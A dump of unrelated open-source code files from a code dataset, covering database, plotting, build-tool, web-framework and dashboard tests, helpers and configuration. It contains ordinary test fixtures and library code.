fmtFingerprintMask := tree.FmtFlags(tree.QueryFormattingForFingerprintsMask.Get(&s.ClusterSettings().SV))
p := internalPlanner.(*planner)
stmt, err := parser.ParseOne("SELECT 1")
if err != nil {
t.Fatal(err)
}
p.stmt = makeStatement(
ctx, stmt, clusterunique.ID{}, fmtFingerprintMask, nil, /* statementHintsCache */
)
if err := p.makeOptimizerPlan(ctx); err != nil {
t.Fatal(err)
}
if p.SessionData().DisablePlanGists {
t.Error("expected gists to be enabled by default")
}
if p.instrumentation.planGist.String() == "" {
t.Error("expected gist by default")
}
internalPlanner, cleanup = NewInternalPlanner(
"test",
kv.NewTxn(ctx, db, s.NodeID()),
username.NodeUserName(),
&MemoryMetrics{},
&execCfg,
sd,
)
defer cleanup()
p = internalPlanner.(*planner)
p.SessionData().DisablePlanGists = true
p.stmt = makeStatement(
ctx, stmt, clusterunique.ID{}, fmtFingerprintMask, nil, /* statementHintsCache */
)
if err := p.makeOptimizerPlan(ctx); err != nil {
t.Fatal(err)
}
if p.instrumentation.planGist.String() != "" {
t.Error("expected no gist")
}
} | go | github | https://github.com/cockroachdb/cockroach | pkg/sql/plan_opt_test.go |
''' Functions to help with testing Bokeh and reporting issues.
'''
from __future__ import absolute_import, print_function
import codecs
import errno
from inspect import isclass, isfunction, getmembers
import os
import importlib
import shutil
import sys
import tempfile
import pytest
from six import string_types
from .api import INTERNAL, PUBLIC
from .api import is_declared, is_level, is_version
def verify_all(module, ALL):
class Test___all__(object):
def test___all__(self):
if isinstance(module, string_types):
mod = importlib.import_module(module)
else:
mod = module
assert hasattr(mod, "__all__")
assert mod.__all__ == ALL
@pytest.mark.parametrize('name', ALL)
def test_contents(self, name):
if isinstance(module, string_types):
mod = importlib.import_module(module)
else:
mod = module
assert hasattr(mod, name)
return Test___all__
def verify_api(module, api):
class Test_api(object):
test_public_api = _generate_api_check(module, api, PUBLIC)
test_internal_api = _generate_api_check(module, api, INTERNAL)
@pytest.mark.api
def test_all_declared(self):
to_check = []
for name, obj in getmembers(module):
# only test objects defined in this module
if getattr(obj, '__module__', None) != module.__name__: continue
# pure private objects are not versioned
if name.startswith('_'): continue
to_check.append((name, obj))
if isclass(obj):
for cname, cobj in getmembers(obj):
# pure private methods are not versioned
if cname.startswith('_'): continue
to_check.append((name + "." + cname, cobj))
for (name, obj) in to_check:
if isfunction(obj):
assert is_declared(obj), "visible function %r is not API declared" % name
elif isclass(obj):
assert is_declared(obj), "visible class %r is not API declared" % name
elif isinstance(obj, property):
assert is_declared(obj.fget), "visible Python property getter %r is not API declared" % name
if obj.fdel is not None:
assert is_declared(obj.fset), "visible Python property getter %r is not API declared" % name
if obj.fdel is not None:
assert is_declared(obj.fdel), "visible Python property getter %r is not API declared" % name
@pytest.mark.api
def test_all_tested(self):
for level in (INTERNAL, PUBLIC):
recorded = module.__bkapi__[level]
assert len(api[level]) == recorded, "expected %d tests for %s API objects in %s, got %d" % (recorded, level, module.__name__, len(api[level]))
return Test_api
def _generate_api_check(module, api, level):
if len(api[level]) > 0:
@pytest.mark.parametrize('name,version', api[level], ids=str)
@pytest.mark.api
def test_api(self, name, version):
assert isinstance(version, tuple)
assert len(version) == 3
assert version >= (1, 0, 0)
elts = name.split(".")
# property
if len(elts) == 3:
(clsname, propname, proptype) = elts
prop = getattr(module, clsname).__dict__[propname]
obj = getattr(prop, proptype)
# method
elif len(elts) == 2:
(clsname, attr) = elts
obj = getattr(getattr(module, clsname), attr)
# function
else:
obj = getattr(module, name)
assert is_level(obj, level), "%s expected to declare api level %r" % (name, level)
assert is_version(obj, version), "%s expected to declare first-version %s" % (name, version)
else:
@pytest.mark.api
def test_api(self): assert True
return test_api
def makedirs_ok_if_exists(path):
try:
os.makedirs(path)
except IOError as e: # pragma: no cover (py3 only)
if e.errno != errno.EEXIST:
raise e
except OSError as e: # pragma: no cover (py2 only)
if e.errno != errno.EEXIST:
raise e
return path
local_tmp = os.path.abspath("./build/tmp")
makedirs_ok_if_exists(local_tmp)
class WorkingDir(object):
def __init__(self, pwd):
self._new = pwd
self._old = os.getcwd()
def __exit__(self, type, value, traceback):
os.chdir(self._old)
def __enter__(self):
os.chdir(self._new)
return self._new
class TmpDir(object):
def __init__(self, prefix):
self._dir = tempfile.mkdtemp(prefix=prefix, dir=local_tmp)
def __exit__(self, type, value, traceback):
try:
shutil.rmtree(path=self._dir)
except Exception as e:
# prefer original exception to rmtree exception
if value is None:
print("Exception cleaning up TmpDir %s: %s" % (self._dir, str(e)), file=sys.stderr)
raise e
else:
print("Failed to clean up TmpDir %s: %s" % (self._dir, str(e)), file=sys.stderr)
raise value
def __enter__(self):
return self._dir
def with_temporary_file(func, dir=None):
if dir is None:
dir = local_tmp
import tempfile
# Windows throws a permission denied if we use delete=True for
# auto-delete, and then try to open the file again ourselves
# with f.name. So we manually delete in the finally block
# below.
f = tempfile.NamedTemporaryFile(dir=dir, delete=False)
try:
func(f)
finally:
f.close()
os.remove(f.name)
def with_directory_contents(contents, func):
with (TmpDir(prefix="test-")) as dirname:
for filename, file_content in contents.items():
path = os.path.join(dirname, filename)
if file_content is None:
# make a directory
makedirs_ok_if_exists(path)
else:
makedirs_ok_if_exists(os.path.dirname(path))
with codecs.open(path, 'w', 'utf-8') as f:
f.write(file_content)
return func(os.path.realpath(dirname))
def with_file_contents(contents, func, dir=None):
def with_file_object(f):
f.write(contents.encode("UTF-8"))
f.flush()
# Windows will get mad if we try to rename it without closing,
# and some users of with_file_contents want to rename it.
f.close()
func(f.name)
with_temporary_file(with_file_object, dir=dir)
def skipIfPy3(message):
''' unittest decorator to skip a test for Python 3
'''
from unittest import skipIf
from .platform import is_py3
return skipIf(is_py3(), message) | unknown | codeparrot/codeparrot-clean | ||
"""SCons.Tool.aixc++
Tool-specific initialization for IBM xlC / Visual Age C++ compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/aixc++.py 2009/09/04 16:33:07 david"
import os.path
import SCons.Platform.aix
cplusplus = __import__('c++', globals(), locals(), [])
packages = ['vacpp.cmp.core', 'vacpp.cmp.batch', 'vacpp.cmp.C', 'ibmcxx.cmp']
def get_xlc(env):
xlc = env.get('CXX', 'xlC')
xlc_r = env.get('SHCXX', 'xlC_r')
return SCons.Platform.aix.get_xlc(env, xlc, xlc_r, packages)
def smart_cxxflags(source, target, env, for_signature):
build_dir = env.GetBuildPath()
if build_dir:
return '-qtempinc=' + os.path.join(build_dir, 'tempinc')
return ''
def generate(env):
"""Add Builders and construction variables for xlC / Visual Age
suite to an Environment."""
path, _cxx, _shcxx, version = get_xlc(env)
if path:
_cxx = os.path.join(path, _cxx)
_shcxx = os.path.join(path, _shcxx)
cplusplus.generate(env)
env['CXX'] = _cxx
env['SHCXX'] = _shcxx
env['CXXVERSION'] = version
env['SHOBJSUFFIX'] = '.pic.o'
def exists(env):
path, _cxx, _shcxx, version = get_xlc(env)
if path and _cxx:
xlc = os.path.join(path, _cxx)
if os.path.exists(xlc):
return xlc
return None
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4: | unknown | codeparrot/codeparrot-clean | ||
def _get_number_of_moves(tab):
rows = len(tab)
cols = None
for row in tab:
if cols is None:
cols = len(row)
if cols != len(row):
raise ValueError("la cantidad de columnas de la matriz " +
"debe ser igual en cada fila")
return (rows,cols)
def _move_ij(tab, move, empty):
tab = [list(r) for r in tab]
if move != empty:
i,j = move
nonei, nonej = empty
if i+1 == nonei or i-1 == nonei or j+1 == nonej or j-1 == nonej:
aux = tab[i][j]
tab[i][j] = None
tab[nonei][nonej] = aux
return tab
def _get_empty_cord(tab, empty):
emptys=[]
for idx_i in range(len(tab)):
for idx_j in range(len(tab[idx_i])):
if tab[idx_i][idx_j] == empty:
cord = (idx_i, idx_j)
emptys.append(cord)
return emptys
def _get_all_child(tab, empty = None):
tab = [list(l) for l in tab]
movesi, movesj = _get_number_of_moves(tab)
childs = []
emptys = _get_empty_cord(tab, empty)
for empty in emptys:
for idxi in range(movesi):
for idxj in range(movesj):
move = (idxi, idxj)
new_tab = _move_ij(tab, move, empty)
childs.append(new_tab)
return childs
if __name__ == '__main__':
def print_matrix(matrix, tabs=0):
ttp = [ "\t" for c in range(tabs)]
ttp = "".join(ttp)
for row in matrix:
print(ttp + str(row))
tab = [
[1,2,3],
[8, None, 4],
[7,6,5]
]
tabs = _get_all_child(tab, None)
for t in tabs:
print_matrix(t, 2)
print "" | unknown | codeparrot/codeparrot-clean | ||
# The {{ project_name }} should be rendered. | python | github | https://github.com/django/django | tests/admin_scripts/custom_templates/project_template/.hidden/render.py |
/*
* Copyright 2014-2019 JetBrains s.r.o and contributors. Use of this source code is governed by the Apache 2.0 license.
*/
package io.ktor.tests.http
import io.ktor.http.*
import kotlin.test.*
class ContentTypeMatchTest {
@Test
fun testTypeAndSubtype() {
assertTrue { ContentType.parse("text/plain").match("*") }
assertTrue { ContentType.parse("text/plain").match("* ") }
assertTrue { ContentType.parse("text/plain").match("*/*") }
assertTrue { ContentType.parse("text/plain").match("*/ *") }
assertTrue { ContentType.parse("text/plain").match("*/plain") }
assertTrue { ContentType.parse("text/plain").match("* /plain") }
assertTrue { ContentType.parse("text/PLAIN").match("*/plain") }
assertTrue { ContentType.parse("text/plain").match("text/*") }
assertTrue { ContentType.parse("text/plain").match("text/plain") }
assertTrue { ContentType.parse("text/plain").match("TEXT/plain") }
assertFailsWith<BadContentTypeFormatException> { ContentType.parse("text/") }
assertFailsWith<BadContentTypeFormatException> { ContentType.parse("/plain") }
assertFailsWith<BadContentTypeFormatException> { ContentType.parse("foobar") }
assertFailsWith<BadContentTypeFormatException> { ContentType.parse("foo/bar/baz") }
assertFalse(ContentType.parse("text/plain").match("image/plain"))
assertFalse(ContentType.parse("text/plain").match("text/xml"))
}
@Test
fun testParametersConstants() {
assertTrue { ContentType.parse("a/b; a=1").match("*/*; a=1") }
assertTrue { ContentType.parse("a/b; A=1").match("*/*; a=1") }
assertFalse(ContentType.parse("a/b").match("*/*; a=2"))
assertFalse(ContentType.parse("a/b; a=1").match("*/*; a=2"))
assertFalse(ContentType.parse("a/b; A=1").match("*/*; a=2"))
}
@Test
fun testParametersWithSubtype() {
assertTrue { ContentType.parse("a/b; a=1").match("a/b") }
assertTrue { ContentType.parse("a/b; a=xyz").match("a/b; a=XYZ") }
}
@Test
fun testParametersValueWildcard() {
assertTrue(ContentType.parse("a/b; a=1").match("*/*; a=*"))
assertFalse(ContentType.parse("a/b; b=1").match("*/*; a=*"))
}
@Test
fun testParametersNameWildcard() {
assertTrue(ContentType.parse("a/b; a=1").match("*/*; *=1"))
assertTrue(ContentType.parse("a/b; a=X").match("*/*; *=x"))
assertFalse(ContentType.parse("a/b; a=2").match("*/*; *=1"))
assertFalse(ContentType.parse("a/b; a=y").match("*/*; *=x"))
}
@Test
fun testParametersAllWildcard() {
assertTrue(ContentType.parse("a/b; a=2").match("*/*; *=*"))
assertTrue(ContentType.parse("a/b").match("*/*; *=*"))
}
@Test
fun testContentTypeConst() {
assertTrue { ContentType.Application.FormUrlEncoded.match(ContentType.Application.FormUrlEncoded) }
assertFalse(ContentType.Application.Json.match(ContentType.Application.FormUrlEncoded))
}
} | kotlin | github | https://github.com/ktorio/ktor | ktor-http/common/test/io/ktor/tests/http/ContentTypeMatchTest.kt |
# Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from contextlib import contextmanager
import copy
import datetime
import functools
from snf_django.utils.testing import with_settings, override_settings, \
assertIn, assertGreater, assertRaises
from django.test import Client
from django.test import TestCase
from django.core import mail
from django.http import SimpleCookie, HttpRequest, QueryDict
from django.utils.importlib import import_module
from django.utils import simplejson as json
from astakos.im.activation_backends import *
from astakos.im.views.target.shibboleth import Tokens as ShibbolethTokens
from astakos.im.models import *
from astakos.im import functions
from astakos.im import settings as astakos_settings
from astakos.im import forms
from astakos.im import activation_backends
from astakos.im import auth as auth_functions
from urllib import quote
from datetime import timedelta
from astakos.im import messages
from astakos.im import auth_providers
from astakos.im import quotas
from astakos.im import register
from django.conf import settings
# set some common settings
astakos_settings.EMAILCHANGE_ENABLED = True
astakos_settings.RECAPTCHA_ENABLED = False
settings.LOGGING_SETUP['disable_existing_loggers'] = False
# shortcut decorators to override provider settings
# e.g. shibboleth_settings(ENABLED=True) will set
# ASTAKOS_AUTH_PROVIDER_SHIBBOLETH_ENABLED = True in global synnefo settings
prefixes = {'providers': 'AUTH_PROVIDER_',
'shibboleth': 'ASTAKOS_AUTH_PROVIDER_SHIBBOLETH_',
'local': 'ASTAKOS_AUTH_PROVIDER_LOCAL_'}
im_settings = functools.partial(with_settings, astakos_settings)
shibboleth_settings = functools.partial(with_settings,
settings,
prefix=prefixes['shibboleth'])
localauth_settings = functools.partial(with_settings, settings,
prefix=prefixes['local'])
class AstakosTestClient(Client):
pass
class ShibbolethClient(AstakosTestClient):
"""
A shibboleth agnostic client.
"""
VALID_TOKENS = filter(lambda x: not x.startswith("_"),
dir(ShibbolethTokens))
def __init__(self, *args, **kwargs):
self.tokens = kwargs.pop('tokens', {})
super(ShibbolethClient, self).__init__(*args, **kwargs)
def set_tokens(self, **kwargs):
for key, value in kwargs.iteritems():
key = 'SHIB_%s' % key.upper()
if not key in self.VALID_TOKENS:
raise Exception('Invalid shibboleth token')
self.tokens[key] = value
def unset_tokens(self, *keys):
for key in keys:
key = 'SHIB_%s' % param.upper()
if key in self.tokens:
del self.tokens[key]
def reset_tokens(self):
self.tokens = {}
def get_http_token(self, key):
http_header = getattr(ShibbolethTokens, key)
return http_header
def request(self, **request):
"""
Transform valid shibboleth tokens to http headers
"""
for token, value in self.tokens.iteritems():
request[self.get_http_token(token)] = value
for param in request.keys():
key = 'SHIB_%s' % param.upper()
if key in self.VALID_TOKENS:
request[self.get_http_token(key)] = request[param]
del request[param]
return super(ShibbolethClient, self).request(**request)
def get_user_client(username, password="password"):
client = Client()
client.login(username=username, password=password)
return client
def get_local_user(username, **kwargs):
try:
return AstakosUser.objects.get(email=username)
except:
user = auth_functions.make_local_user(email=username,
has_signed_terms=True)
user.set_password(kwargs.pop('password', 'password'))
for key, value in kwargs.iteritems():
setattr(user, key, value)
user.save()
if kwargs.get("is_active", True):
backend = activation_backends.get_backend()
backend.verify_user(user, user.verification_code)
backend.accept_user(user)
return user
def get_mailbox(email):
mails = []
for sent_email in mail.outbox:
for recipient in sent_email.recipients():
if email in recipient:
mails.append(sent_email)
return mails
def reverse_with_next(next_reverse, base_reverse='login'):
return reverse(base_reverse) + '?next=%s' % reverse(next_reverse) | unknown | codeparrot/codeparrot-clean | ||
{
"kind": "Dashboard",
"apiVersion": "dashboard.grafana.app/v2alpha1",
"metadata": {
"name": "v42.hidefrom_tooltip.v42"
},
"spec": {
"annotations": [
{
"kind": "AnnotationQuery",
"spec": {
"datasource": {
"type": "grafana",
"uid": "-- Grafana --"
},
"query": {
"kind": "grafana",
"spec": {}
},
"enable": true,
"hide": true,
"iconColor": "rgba(0, 211, 255, 1)",
"name": "Annotations \u0026 Alerts",
"builtIn": true,
"legacyOptions": {
"type": "dashboard"
}
}
}
],
"cursorSync": "Off",
"editable": true,
"elements": {
"panel-1": {
"kind": "Panel",
"spec": {
"id": 1,
"title": "Panel with hideFrom.viz = true",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "timeseries",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byName",
"options": "Field1"
},
"properties": [
{
"id": "custom.hideFrom",
"value": {
"tooltip": true,
"viz": true
}
}
]
}
]
}
}
}
}
},
"panel-2": {
"kind": "Panel",
"spec": {
"id": 2,
"title": "Panel with multiple overrides",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "timeseries",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byName",
"options": "Field2"
},
"properties": [
{
"id": "custom.hideFrom",
"value": {
"legend": false,
"tooltip": true,
"viz": true
}
}
]
},
{
"__systemRef": "hideSeriesFrom",
"matcher": {
"id": "byNames",
"options": {
"mode": "exclude",
"names": [
"foo"
],
"prefix": "All except:",
"readOnly": true
}
},
"properties": [
{
"id": "custom.hideFrom",
"value": {
"legend": false,
"tooltip": true,
"viz": true
}
}
]
}
]
}
}
}
}
},
"panel-4": {
"kind": "Panel",
"spec": {
"id": 4,
"title": "Nested panel with hideFrom",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "stat",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byRegexp",
"options": "/.*/"
},
"properties": [
{
"id": "custom.hideFrom",
"value": {
"tooltip": true,
"viz": true
}
}
]
}
]
}
}
}
}
},
"panel-5": {
"kind": "Panel",
"spec": {
"id": 5,
"title": "Panel without hideFrom",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "table",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byName",
"options": "Time"
},
"properties": [
{
"id": "unit",
"value": "short"
}
]
}
]
}
}
}
}
},
"panel-6": {
"kind": "Panel",
"spec": {
"id": 6,
"title": "Panel with viz false (should not be modified)",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "gauge",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byValue",
"options": {
"op": "gte",
"reducer": "allIsZero",
"value": 0
}
},
"properties": [
{
"id": "unit",
"value": "short"
}
]
}
]
}
}
}
}
},
"panel-7": {
"kind": "Panel",
"spec": {
"id": 7,
"title": "Panel with already set tooltip (should not be modified)",
"description": "",
"links": [],
"data": {
"kind": "QueryGroup",
"spec": {
"queries": [],
"transformations": [],
"queryOptions": {}
}
},
"vizConfig": {
"kind": "barchart",
"spec": {
"pluginVersion": "",
"options": {},
"fieldConfig": {
"defaults": {},
"overrides": [
{
"matcher": {
"id": "byName",
"options": "{__name__=\"ALERTS\", alertname=\"k6CloudServiceErrorsLogged\"}"
},
"properties": [
{
"id": "custom.hideFrom",
"value": {
"legend": false,
"tooltip": true,
"viz": true
}
}
]
}
]
}
}
}
}
}
},
"layout": {
"kind": "RowsLayout",
"spec": {
"rows": [
{
"kind": "RowsLayoutRow",
"spec": {
"title": "",
"collapse": true,
"hideHeader": true,
"layout": {
"kind": "GridLayout",
"spec": {
"items": [
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-1"
}
}
},
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-2"
}
}
}
]
}
}
}
},
{
"kind": "RowsLayoutRow",
"spec": {
"title": "Row with nested panels",
"collapse": true,
"layout": {
"kind": "GridLayout",
"spec": {
"items": [
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-4"
}
}
},
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-5"
}
}
},
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-6"
}
}
},
{
"kind": "GridLayoutItem",
"spec": {
"x": 0,
"y": 0,
"width": 6,
"height": 3,
"element": {
"kind": "ElementReference",
"name": "panel-7"
}
}
}
]
}
}
}
}
]
}
},
"links": [],
"liveNow": false,
"preload": false,
"tags": [],
"timeSettings": {
"timezone": "",
"from": "now-6h",
"to": "now",
"autoRefresh": "",
"autoRefreshIntervals": [
"5s",
"10s",
"30s",
"1m",
"5m",
"15m",
"30m",
"1h",
"2h",
"1d"
],
"hideTimepicker": false,
"fiscalYearStartMonth": 0
},
"title": "v42 Migration Test - HideFrom Tooltip",
"variables": []
},
"status": {
"conversion": {
"failed": false,
"storedVersion": "v2beta1"
}
}
} | json | github | https://github.com/grafana/grafana | apps/dashboard/pkg/migration/conversion/testdata/output/migrated_dashboards_from_v0_to_v2/v2beta1.v42.hidefrom_tooltip.v2alpha1.json |
"""
test utils
"""
from nose.plugins.attrib import attr
from lms.djangoapps.ccx.tests.factories import CcxFactory
from student.roles import CourseCcxCoachRole
from student.tests.factories import (
AdminFactory,
)
from xmodule.modulestore.tests.django_utils import (
ModuleStoreTestCase,
TEST_DATA_SPLIT_MODULESTORE)
from xmodule.modulestore.tests.factories import CourseFactory
from ccx_keys.locator import CCXLocator
@attr('shard_1')
class TestGetCCXFromCCXLocator(ModuleStoreTestCase):
"""Verify that get_ccx_from_ccx_locator functions properly"""
MODULESTORE = TEST_DATA_SPLIT_MODULESTORE
def setUp(self):
"""Set up a course, coach, ccx and user"""
super(TestGetCCXFromCCXLocator, self).setUp()
self.course = CourseFactory.create()
coach = self.coach = AdminFactory.create()
role = CourseCcxCoachRole(self.course.id)
role.add_users(coach)
def call_fut(self, course_id):
"""call the function under test in this test case"""
from lms.djangoapps.ccx.utils import get_ccx_from_ccx_locator
return get_ccx_from_ccx_locator(course_id)
def test_non_ccx_locator(self):
"""verify that nothing is returned if locator is not a ccx locator
"""
result = self.call_fut(self.course.id)
self.assertEqual(result, None)
def test_ccx_locator(self):
"""verify that the ccx is retuned if using a ccx locator
"""
ccx = CcxFactory(course_id=self.course.id, coach=self.coach)
course_key = CCXLocator.from_course_locator(self.course.id, ccx.id)
result = self.call_fut(course_key)
self.assertEqual(result, ccx) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Unit tests for the easy_xml.py file. """
import gyp.easy_xml as easy_xml
import unittest
import StringIO
class TestSequenceFunctions(unittest.TestCase):
def setUp(self):
self.stderr = StringIO.StringIO()
def test_EasyXml_simple(self):
self.assertEqual(
easy_xml.XmlToString(['test']),
'<?xml version="1.0" encoding="utf-8"?><test/>')
self.assertEqual(
easy_xml.XmlToString(['test'], encoding='Windows-1252'),
'<?xml version="1.0" encoding="Windows-1252"?><test/>')
def test_EasyXml_simple_with_attributes(self):
self.assertEqual(
easy_xml.XmlToString(['test2', {'a': 'value1', 'b': 'value2'}]),
'<?xml version="1.0" encoding="utf-8"?><test2 a="value1" b="value2"/>')
def test_EasyXml_escaping(self):
original = '<test>\'"\r&\nfoo'
converted = '<test>'"
&
foo'
self.assertEqual(
easy_xml.XmlToString(['test3', {'a': original}, original]),
'<?xml version="1.0" encoding="utf-8"?><test3 a="%s">%s</test3>' %
(converted, converted))
def test_EasyXml_pretty(self):
self.assertEqual(
easy_xml.XmlToString(
['test3',
['GrandParent',
['Parent1',
['Child']
],
['Parent2']
]
],
pretty=True),
'<?xml version="1.0" encoding="utf-8"?>\n'
'<test3>\n'
' <GrandParent>\n'
' <Parent1>\n'
' <Child/>\n'
' </Parent1>\n'
' <Parent2/>\n'
' </GrandParent>\n'
'</test3>\n')
def test_EasyXml_complex(self):
# We want to create:
target = (
'<?xml version="1.0" encoding="utf-8"?>'
'<Project>'
'<PropertyGroup Label="Globals">'
'<ProjectGuid>{D2250C20-3A94-4FB9-AF73-11BC5B73884B}</ProjectGuid>'
'<Keyword>Win32Proj</Keyword>'
'<RootNamespace>automated_ui_tests</RootNamespace>'
'</PropertyGroup>'
'<Import Project="$(VCTargetsPath)\\Microsoft.Cpp.props"/>'
'<PropertyGroup '
'Condition="'$(Configuration)|$(Platform)'=='
''Debug|Win32'" Label="Configuration">'
'<ConfigurationType>Application</ConfigurationType>'
'<CharacterSet>Unicode</CharacterSet>'
'</PropertyGroup>'
'</Project>')
xml = easy_xml.XmlToString(
['Project',
['PropertyGroup', {'Label': 'Globals'},
['ProjectGuid', '{D2250C20-3A94-4FB9-AF73-11BC5B73884B}'],
['Keyword', 'Win32Proj'],
['RootNamespace', 'automated_ui_tests']
],
['Import', {'Project': '$(VCTargetsPath)\\Microsoft.Cpp.props'}],
['PropertyGroup',
{'Condition': "'$(Configuration)|$(Platform)'=='Debug|Win32'",
'Label': 'Configuration'},
['ConfigurationType', 'Application'],
['CharacterSet', 'Unicode']
]
])
self.assertEqual(xml, target)
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Models registries.
"""
from collections import Mapping
from contextlib import contextmanager
import logging
import threading
import openerp
from .. import SUPERUSER_ID
from openerp.tools import assertion_report, lazy_property
_logger = logging.getLogger(__name__)
class Registry(Mapping):
""" Model registry for a particular database.
The registry is essentially a mapping between model names and model
instances. There is one registry instance per database.
"""
def __init__(self, db_name):
super(Registry, self).__init__()
self.models = {} # model name/model instance mapping
self._sql_error = {}
self._store_function = {}
self._pure_function_fields = {} # {model: [field, ...], ...}
self._init = True
self._init_parent = {}
self._assertion_report = assertion_report.assertion_report()
self.fields_by_model = None
# modules fully loaded (maintained during init phase by `loading` module)
self._init_modules = set()
self.db_name = db_name
self._db = openerp.sql_db.db_connect(db_name)
# special cursor for test mode; None means "normal" mode
self.test_cr = None
# Indicates that the registry is
self.ready = False
# Inter-process signaling (used only when openerp.multi_process is True):
# The `base_registry_signaling` sequence indicates the whole registry
# must be reloaded.
# The `base_cache_signaling sequence` indicates all caches must be
# invalidated (i.e. cleared).
self.base_registry_signaling_sequence = None
self.base_cache_signaling_sequence = None
# Flag indicating if at least one model cache has been cleared.
# Useful only in a multi-process context.
self._any_cache_cleared = False
cr = self.cursor()
has_unaccent = openerp.modules.db.has_unaccent(cr)
if openerp.tools.config['unaccent'] and not has_unaccent:
_logger.warning("The option --unaccent was given but no unaccent() function was found in database.")
self.has_unaccent = openerp.tools.config['unaccent'] and has_unaccent
cr.close()
#
# Mapping abstract methods implementation
# => mixin provides methods keys, items, values, get, __eq__, and __ne__
#
def __len__(self):
""" Return the size of the registry. """
return len(self.models)
def __iter__(self):
""" Return an iterator over all model names. """
return iter(self.models)
def __getitem__(self, model_name):
""" Return the model with the given name or raise KeyError if it doesn't exist."""
return self.models[model_name]
def __call__(self, model_name):
""" Same as ``self[model_name]``. """
return self.models[model_name]
@lazy_property
def pure_function_fields(self):
""" Return the list of pure function fields (field objects) """
fields = []
for mname, fnames in self._pure_function_fields.iteritems():
model_fields = self[mname]._fields
for fname in fnames:
fields.append(model_fields[fname])
return fields
def do_parent_store(self, cr):
for o in self._init_parent:
self.get(o)._parent_store_compute(cr)
self._init = False
def obj_list(self):
""" Return the list of model names in this registry."""
return self.keys()
def add(self, model_name, model):
""" Add or replace a model in the registry."""
self.models[model_name] = model
def load(self, cr, module):
""" Load a given module in the registry.
At the Python level, the modules are already loaded, but not yet on a
per-registry level. This method populates a registry with the given
modules, i.e. it instanciates all the classes of a the given module
and registers them in the registry.
"""
from .. import models
